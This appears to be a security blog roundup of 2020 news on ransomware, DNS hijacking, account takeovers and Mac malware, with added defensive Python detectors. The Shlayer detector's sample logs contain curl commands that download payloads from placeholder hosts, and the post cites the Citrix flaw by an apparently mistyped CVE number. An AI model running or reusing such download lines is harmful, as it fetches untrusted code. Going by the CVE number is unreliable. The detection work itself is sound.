US Defense Contractor Hit with Ransomware Infection

In the United States, contractors with the Department of Defense are required to maintain a minimum baseline of security controls to protect defense-related information. Either those controls are not strong enough, or EWA did not implement the correct measures to prevent the ransomware infection:

Electronic Warfare Associates (EWA), a 40-year-old electronics company and a well-known US government contractor, has suffered a ransomware infection, ZDNet has learned.

The infection hit the company last week. Among the systems that had data encrypted during the incident were the company's web servers.

Signs of the incident are still visible online. Encrypted files and ransom notes are still cached in Google search results, even a week after the company took down the impacted web servers.

If you are unfamiliar with Ryuk, it is one of the nastier ransomware strains:

Making matters worse is that Ryuk is not your regular ransomware strain. This type of ransomware is solely used in targeted attacks on high-profile companies.

It is usually installed on infected networks after a victim is infected with the Emotet/TrickBot trojans, two well-known cybercrime-as-a-service platforms.

The Ryuk gang uses the Emotet/TrickBot-infected machine as entry point and launch pad to scan and spread inside a company's internal network, exfiltrate data, and then deploy their ransomware.

Contagion Hits Top 10 on iTunes Movie Chart Amid Coronavirus Outbreak

Speaking of the Wuhan Coronavirus outbreak, the exceptionally well-written and well-directed Steven Soderbergh movie Contagion has hit the top 10 on iTunes as people become interested in learning about a potential pandemic:

A woman, played by Oscar winner Gwyneth Paltrow, returns home to Minnesota from a business trip in Hong Kong. Though she exhibits fatigue and cold-like symptoms, she dismisses it as jet lag. Within 24 hours, she's dead, alongside her young son. Her husband, played by Matt Damon, is somehow immune and survives.

Thus begins Steven Soderbergh's 2011 movie Contagion. Over the next hour and 46 minutes, the movie tracks what happens when a deadly China-born virus goes global and leads to mass chaos as epidemiologists race to find a vaccine.

On Tuesday, the thriller rocketed to No. 10 on the iTunes movie rental chart, where it shares space with such of-the-moment titles as Joker (No. 1), Once Upon a Time in Hollywood (No. 3), Parasite (No. 4) and Hustlers (No. 8).

Notwithstanding the literal batshit craziness known as the Wuhan Coronavirus, Contagion is an outstanding movie. The pacing is amazing, and the story is entirely believable. Even if this outbreak had not occurred I would be recommending this movie.

Epidemics Like the Wuhan Coronavirus are Human-made

The current Wuhan Coronavirus issue has not reached a Contagion-level epidemic but there is a chance the virus could shift towards such a trajectory. I suspect things are going to get substantially worse before getting better. I fly all over the Asia-Pacific region on business, and this outbreak has me quite spooked. At the end of the day, unfortunately, we need to turn around and look at ourselves. Humans are largely responsible for these types of diseases and here are some of the reasons:

Current circumstances include a perilous trade in wildlife for food, with supply chains stretching through Asia, Africa and to a lesser extent, the United States and elsewhere. That trade has now been outlawed in China, on a temporary basis; but it was outlawed also during SARS, then allowed to resume — with bats, civets, porcupines, turtles, bamboo rats, many kinds of birds and other animals piled together in markets such as the one in Wuhan.

Current circumstances also include 7.6 billion hungry humans: some of them impoverished and desperate for protein; some affluent and wasteful and empowered to travel every which way by airplane. These factors are unprecedented on planet Earth: We know from the fossil record, by absence of evidence, that no large-bodied animal has ever been nearly so abundant as humans are now, let alone so effective at arrogating resources. And one consequence of that abundance, that power, and the consequent ecological disturbances is increasing viral exchanges — first from animal to human, then from human to human, sometimes on a pandemic scale.

We invade tropical forests and other wild landscapes, which harbor so many species of animals and plants — and within those creatures, so many unknown viruses. We cut the trees; we kill the animals or cage them and send them to markets. We disrupt ecosystems, and we shake viruses loose from their natural hosts. When that happens, they need a new host. Often, we are it.

Agent Smith said it best in The Matrix:

Every mammal on this planet instinctively develops a natural equilibrium with the surrounding environment but you humans do not. You move to an area and you multiply and multiply until every natural resource is consumed and the only way you can survive is to spread to another area. There is another organism on this planet that follows the same pattern. Do you know what it is? A virus. Human beings are a disease, a cancer of this planet. You're a plague and we are the cure.

Is There Really a Man Holding an iPhone in This 1937 Painting?

That cannot possibly be what my brain is telling me it is. Surely this is doctored:

It's not clear exactly who this man is, but he might as well be popping off a selfie or thumbing through his news feed. He seems to gaze into the handheld device in such a way that renders all-too-familiar today, as if he's just read a bad tweet or recoiling from a Trump-related push notification from the Times. He would almost look unremarkable, if only he and the world around him existed at any point in the past decade.

This is one of the craziest things I have seen. The power of suggestion is strong with this one.

Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 are believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected by the operations, ranging from government ministries and agencies to private industry and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting. If you are unfamiliar with the term, it is the act of tricking unsuspecting users into entering their login credentials on a fraudulent web site or application. It usually starts with a phishing email directing users to a web site that appears to be one the victim legitimately uses, asking them to log in, and then storing the credentials for use in a later operation.

Once the attackers had amassed enough credential data, knowing that average users often reuse the same password across multiple logins, the adversaries could then attempt to breach personal accounts - such as Twitter, Facebook, Gmail, and more - as well as official government or business accounts. The latter are the crown jewels, although the personal accounts may also lead to additional opportunistic, targeted attacks.

What I find most alarming is that certain DNS top-level domain providers were breached. The actual DNS servers themselves do not appear to have been affected, but a number of the organizations controlling them were compromised. Those organizations should know better, and should have implemented stronger security controls and security awareness.

This demonstrates how anyone can be the victim of a cyber attack.
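DNS hijacking of the kind described in this section is visible from the outside as resolvers handing back records the zone owner never published. The following is an added example, not code from the original post or from any of the sources quoted: it diffs answers observed from several independent resolvers against a known-good baseline, flags unexpected values with a severity that puts NS changes above a single redirected host, and reports whether every resolver agrees on the bad answer (a registry- or registrar-level change) or only some do (a single poisoned resolver). The zone names, addresses and resolver names are constructed for illustration, and a round-robin subset of the baseline addresses is deliberately not treated as drift.

```python
"""Spot DNS answers that drift from a known-good baseline (added example)."""
from collections import defaultdict

# Severity by record type: an NS change hands the whole zone to whoever
# controls the new servers, so it ranks above one redirected host.
SEVERITY = {"NS": "critical", "MX": "high", "A": "high", "AAAA": "high", "TXT": "medium"}

# Constructed baseline (assumed, not a real zone): what the owner published.
BASELINE = {
    ("example.gov", "NS"): {"ns1.example.gov.", "ns2.example.gov."},
    ("example.gov", "MX"): {"10 mail.example.gov."},
    ("mail.example.gov", "A"): {"198.51.100.10"},
    ("www.example.gov", "A"): {"198.51.100.20", "198.51.100.21"},
}

# Constructed observations: what three independent resolvers returned.
_GOOD = {
    ("example.gov", "NS"): {"ns1.example.gov.", "ns2.example.gov."},
    ("example.gov", "MX"): {"10 mail.example.gov."},
    ("mail.example.gov", "A"): {"198.51.100.10"},
    ("www.example.gov", "A"): {"198.51.100.20"},  # round-robin subset: legitimate
}
_REDIRECTED = dict(_GOOD)
_REDIRECTED[("mail.example.gov", "A")] = {"203.0.113.77"}  # address never published
OBSERVED = {"resolver-a": _GOOD, "resolver-b": _REDIRECTED, "resolver-c": _REDIRECTED}


def detect_drift(baseline, observed):
    """Return one finding per (resolver, record) whose answers leave the baseline."""
    findings = []
    for (name, rtype), expected in baseline.items():
        for resolver in sorted(observed):
            got = observed[resolver].get((name, rtype), set())
            unexpected = sorted(got - expected)  # a subset of the baseline is fine
            if unexpected:
                findings.append({
                    "resolver": resolver,
                    "name": name,
                    "type": rtype,
                    "unexpected": unexpected,
                    "severity": SEVERITY.get(rtype, "medium"),
                })
    return findings


def consensus(findings, observed):
    """Group findings per record and say whether the bad answer is seen everywhere."""
    by_record = defaultdict(list)
    for f in findings:
        by_record[(f["name"], f["type"])].append(f["resolver"])
    total = len(observed)
    return {
        f"{name}/{rtype}": {
            "resolvers": resolvers,
            "scope": "all resolvers" if len(resolvers) == total else "partial",
        }
        for (name, rtype), resolvers in by_record.items()
    }


if __name__ == "__main__":
    found = detect_drift(BASELINE, OBSERVED)
    for f in found:
        print(f"[{f['severity']}] {f['resolver']} {f['name']} {f['type']} -> {f['unexpected']}")
    print(consensus(found, OBSERVED))
```

In production the `OBSERVED` dictionary would be filled by querying resolvers you control and several public ones; the comparison logic stays the same. Alerting on "partial" scope with a single resolver usually points at cache poisoning or a local network problem, while "all resolvers" agreeing on an unpublished value is the registrar or registry compromise pattern this section describes.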

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, including the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

It is not like hacking Twitter accounts is all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams' corporate networks and other online presence. Why have they so far been successful only with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using 2FA there is a much greater chance this attack would not have been successful. I specifically called out the use of an authenticator app rather than SMS because the latter is vulnerable.

It will be interesting to see why only these five teams were selected out of the total thirty-two teams in the NFL today. I doubt it has anything to do with specific motivation to attack these teams, but more so because of lax security on those Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, claiming the average cost of a cyber attack to a Singapore-based business is approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.

Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies they interviewed, arrived at these numbers. The cost of internal incident response is difficult to quantify accurately. The cost of bringing in external resources to assist with breach remediation is much easier to account for.

The likelihood of all of these Singapore-based companies only using outside assistance is small. There is a stronger chance of a more hybrid approach, where internal responders work in conjunction with external help of some sort.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect from the internet due to a cyber attack. Although specifics about how the attack was executed are light, the city claims the attack occurred because of a vulnerable third-party provider:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details, and almost sounds word-smithed enough to purposely obfuscate any potential blame. A German journalist believes the attackers may have exploited vulnerable public-facing Citrix servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-1978 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

If true, this is not at all related to a "weak point in the system of an external provider" but instead a failure of the city's IT department to mitigate CVE-2019-1978. Failure to act in cyber space will almost always lead to a compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking the verdict on file samples and URLs. Although the service offers a variety of benefits, it should never be the sole trusted resource for conducting analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their “analysis checklist”. They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email, as in what's the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for determining the authenticity of files and URLs, but it is not a one-stop shop to be unequivocally trusted. Any incident response playbook leveraging free applications like VT should include multiple tools, whether on-site or cloud-based, for analysis.

The same can be said for Hybrid-Analysis. It is a wonderful tool, most often extremely capable of determining whether or not a sample is malicious. It is not infallible, and because it is a free service it should be used in conjunction with other free services. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate actions.
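The ticket-closing failure in the quoted scenario and the aggregate-score approach described just above can be written down as a triage rule. The following is an added example, not code from the original post, VirusTotal or Hybrid-Analysis: it combines verdicts from several independent sources with the surrounding email context (authentication results, display-name and link-host mismatches, domain age) and will not close a ticket on one scanner's clean verdict alone. The source names, point weights, thresholds and the `EmailContext` fields are this example's own assumptions, and the scenarios at the bottom are constructed.

```python
"""Phishing-link triage that refuses to clear a link on a single scanner (added example)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Verdict:
    source: str   # e.g. "virustotal", "hybrid-analysis", "internal-sandbox"
    result: str   # "malicious" | "suspicious" | "clean" | "unknown"


@dataclass
class EmailContext:
    spf_pass: bool
    dkim_pass: bool
    sender_matches_display_name: bool  # From: domain matches the brand the mail claims
    link_host_matches_brand: bool      # link host belongs to that brand, not a lookalike
    link_domain_age_days: int


# Assumed weights and thresholds; tune them to your own false-positive budget.
WEIGHTS = {"malicious": 10, "suspicious": 4, "unknown": 1, "clean": 0}
MIN_INDEPENDENT_SOURCES = 2
ESCALATE_AT = 3
FLAG_WEIGHT = 3


def context_flags(ctx: EmailContext) -> List[str]:
    """Indicators the quoted Defender skipped: headers, sender, link host, domain age."""
    flags = []
    if not ctx.spf_pass:
        flags.append("spf-fail")
    if not ctx.dkim_pass:
        flags.append("dkim-fail")
    if not ctx.sender_matches_display_name:
        flags.append("display-name-spoof")
    if not ctx.link_host_matches_brand:
        flags.append("lookalike-link")
    if ctx.link_domain_age_days < 30:
        flags.append("young-domain")
    return flags


def triage(verdicts: List[Verdict], ctx: EmailContext) -> Tuple[str, int, List[str]]:
    """Return (decision, score, reasons); decision is "block", "escalate" or "close"."""
    score, reasons = 0, []
    for v in verdicts:
        if v.result not in WEIGHTS:
            raise ValueError(f"unknown verdict {v.result!r} from {v.source}")
        score += WEIGHTS[v.result]
        if v.result != "clean":
            reasons.append(f"{v.source}: {v.result}")
    answered = [v for v in verdicts if v.result != "unknown"]
    if len(answered) < MIN_INDEPENDENT_SOURCES:
        # The core rule: one scanner's "clean" is a starting point, not a verdict.
        score += FLAG_WEIGHT
        reasons.append(f"only {len(answered)} source(s) answered; one scanner cannot clear a link")
    for flag in context_flags(ctx):
        score += FLAG_WEIGHT
        reasons.append(flag)
    if any(v.result == "malicious" for v in verdicts):
        decision = "block"
    elif score >= ESCALATE_AT:
        decision = "escalate"
    else:
        decision = "close"
    return decision, score, reasons


# Constructed scenarios (not real tickets).
CTX_SUSPICIOUS = EmailContext(spf_pass=False, dkim_pass=True, sender_matches_display_name=True,
                              link_host_matches_brand=False, link_domain_age_days=4)
CTX_BENIGN = EmailContext(spf_pass=True, dkim_pass=True, sender_matches_display_name=True,
                          link_host_matches_brand=True, link_domain_age_days=3000)

if __name__ == "__main__":
    vt_only = [Verdict("virustotal", "clean")]
    print(triage(vt_only, CTX_SUSPICIOUS))   # VT clean, headers say otherwise -> escalate
    print(triage(vt_only + [Verdict("hybrid-analysis", "clean")], CTX_BENIGN))  # close
```

The scoring is deliberately simple; what matters is the shape: a unanimous clean result from one aggregator contributes nothing toward closing the ticket until a second independent source and the email's own context agree with it.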

Kobe Bryant RIP

Another legend has passed away far too early. Kobe was only 41 years old, and died with his 13-year-old daughter at his side. The legend is survived by his wife and three daughters.

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily, no sensitive files were compromised in the attack. However, one has to wonder how a government contractor allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Maybe the bar is set so low that a simple ransomware attack can succeed?

While no company can be 100% sure it is safe from attack, there is no reason why a standard ransomware attack should be successful. There are myriad endpoint security controls - from next-generation antivirus to endpoint detection & response - capable of either preventing attacks like ransomware or providing visibility into them.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find vulnerable targets. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years they have done a lot of valuable work to ensure the web is a safe place to browse. In their latest move, Mozilla has taken a look at the Firefox add-on database and removed nearly two-hundred extensions for including malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is this single, relatively unknown company developing that many add-ons? It sure feels like a huge red flag. Surely there is some deception at play.

Review: Using an iPad Pro for Professional Business Travel

I travel across Asia-Pacific for business, having clocked 190k miles in the air in 2019. I generally use a MacBook Pro 13" while away on business, but on a recent Australia trip I took only an iPad Pro 12". This is my detailed review of using an iPad Pro for business travel.

Laughably Unsophisticated Mac Malware

Major malware infections on macOS are quite rare but the operating system is, by no means, immune to what Windows users have had to endure for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises to provide the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infection method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Unless you have good self-control, good web browsing hygiene, and common sense, stay away from web sites offering pirated content. Is that one free pirated movie worth all the work to rebuild your computer after it gets infected with some malware it should never have had in the first place?
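The curl option set quoted from Kaspersky's write-up is a usable detection hook for anyone collecting process-execution telemetry on macOS. The following is an added example, not code from the original post, Kaspersky, or any endpoint product: it parses constructed process-execution log lines, tokenizes each curl command line, and flags invocations carrying all three of `-f`, `-0` and `-L`, whether written as the combined `-f0L`, as separate short options, or as the long forms `--fail`, `--http1.0` and `--location` that curl's manual documents for them. The log line format, user names, hosts and paths are constructed for illustration; the set of short options assumed to take a value is this example's own approximation of curl's option table.

```python
"""Flag curl invocations with the -f -0 -L option set from process logs (added example)."""
import re
import shlex
from typing import Dict, List, Set

# Constructed sample telemetry (not real logs). Hosts use reserved/documentation ranges.
LOG_LINES = [
    '2020-01-26T10:14:03Z user=alice parent=/bin/bash cmd="curl -f0L https://cdn.invalid/p.dat -o /tmp/p"',
    '2020-01-26T10:14:10Z user=bob parent=/usr/bin/python3 cmd="curl --fail --location https://api.example.com/status"',
    '2020-01-26T10:15:00Z user=carol parent=/bin/sh cmd="curl -f -0 -L http://203.0.113.5/s.zip"',
    '2020-01-26T10:16:00Z user=dave parent=/bin/zsh cmd="curl -sSfL https://example.com/install.sh"',
    '2020-01-26T10:17:00Z user=erin parent=/bin/bash cmd="/usr/bin/curl --fail --http1.0 -L -o /tmp/x http://203.0.113.9/y"',
    '2020-01-26T10:18:00Z user=frank parent=/bin/bash cmd="wget -q http://203.0.113.9/y"',
]

LINE_RE = re.compile(r'^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd="(?P<cmd>.*)"$')

# Long spellings of the three options, per curl's manual.
LONG_TO_SHORT = {"--fail": "f", "--http1.0": "0", "--location": "L"}
# Short options that consume a value (assumed subset of curl's table), so that
# "-o -" or "-H 'X: -f0L'" is not misread as a flag cluster.
TAKES_VALUE = set("oHdAeuxXbcEKmrTUw")
SIGNATURE = {"f", "0", "L"}


def curl_short_options(cmd: str) -> Set[str]:
    """Return the single-letter curl options present, normalising long forms."""
    try:
        argv = shlex.split(cmd)
    except ValueError:      # unbalanced quotes: not parseable, not a hit
        return set()
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return set()
    opts: Set[str] = set()
    skip_next = False
    for tok in argv[1:]:
        if skip_next:
            skip_next = False
            continue
        if tok in LONG_TO_SHORT:
            opts.add(LONG_TO_SHORT[tok])
        elif tok.startswith("--") or tok == "-" or not tok.startswith("-"):
            continue        # other long option, stdin marker, URL or value
        else:
            cluster = tok[1:]
            for i, ch in enumerate(cluster):
                opts.add(ch)
                if ch in TAKES_VALUE:
                    # value is the rest of the cluster, or the next token if none remains
                    skip_next = i == len(cluster) - 1
                    break
    return opts


def is_shlayer_style(cmd: str) -> bool:
    return SIGNATURE <= curl_short_options(cmd)


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed fields of every line whose command matches the signature."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_shlayer_style(m["cmd"]):
            hits.append(m.groupdict())
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(f"{hit['ts']} {hit['user']} parent={hit['parent']} :: {hit['cmd']}")
```

`-fL` on its own is common in legitimate install scripts (line four above), so the rule requires the HTTP/1.0 flag as well; pairing a hit with the parent process and the destination host, as the output does, is what turns a match into something an analyst can act on.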

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe writes one of the worst clickbait headlines I have seen recently, stating that cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article itself makes a much different claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 conducted its research through a survey of over 2,700 experts across 100 countries. These experts were rating the impact on their own businesses, not overall global risk as the clickbait headline suggests.

Overall it is not a bad article, but headline hyperbole is strong with this one.